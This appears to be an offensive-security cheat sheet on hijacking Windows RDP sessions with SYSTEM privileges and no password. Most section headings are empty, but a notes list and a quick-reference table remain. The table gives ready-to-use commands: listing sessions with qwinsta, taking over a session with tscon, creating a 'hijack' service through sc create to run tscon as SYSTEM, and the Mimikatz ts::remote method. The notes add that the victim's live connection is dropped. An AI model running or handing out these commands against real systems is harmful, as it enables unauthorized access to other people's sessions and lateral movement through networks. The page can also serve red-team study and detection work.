Overview
As SYSTEM, hijack active or disconnected RDP sessions without knowing the user’s password. Usestscon to switch sessions.
List Sessions
Hijack — From SYSTEM
Get SYSTEM First
Switch Session
Example
Via Service (No Interactive SYSTEM)
Mimikatz Method
Notes
- Requires SYSTEM privileges
- Works on disconnected sessions too
- No password needed for target session
- The original user is disconnected —
tsconreattaches their session to the attacker’s terminal, dropping their live connection (Event ID 4779). Their running programs persist, but they lose the active session. - Server 2019+ may require additional steps
Quick Reference
| Task | Command |
|---|---|
| List sessions | query user or qwinsta |
| Hijack | tscon SESSION_ID /dest:rdp-tcp#YOUR_SESSION |
| Via service | sc create hijack binpath= "cmd /k tscon ..." |
| Mimikatz | ts::remote /id:SESSION_ID |